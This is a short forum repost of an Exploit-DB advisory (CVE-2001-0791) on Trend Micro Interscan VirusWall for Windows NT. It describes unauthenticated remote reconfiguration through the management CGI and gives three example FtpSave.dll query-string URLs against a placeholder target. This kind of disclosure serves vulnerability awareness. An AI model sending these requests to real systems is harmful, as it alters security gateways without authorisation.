Exploit Trend Micro Interscan VirusWall for Windows NT 3.4/3.5/3.51 - Remote Reconfiguration

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
20893
Проверка EDB
  1. Пройдено
Автор
SNSADV
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2001-0791
Дата публикации
2001-05-24
Код:
source: https://www.securityfocus.com/bid/2808/info

Interscan Viruswall is a Virus scanning software package distributed and maintained by Trend Micro. It is designed to scan for virus occurances in both incoming and outgoing traffic via SMTP, FTP, and HTTP at the gateway of the network.

The management interface used with the Interscan Viruswall uses several programs in a cgi directory that may allow a remote attacker to make configuration changes using maliciously-constructed querystrings submitted to the host. 

Examples:

http://target/interscan/cgi-bin/FtpSave.dll?no
http://target/interscan/cgi-bin/FtpSave.dll?yes
http://target/interscan/cgi-bin/FtpSave.dll?I'm%20here
 
Источник
www.exploit-db.com

Похожие темы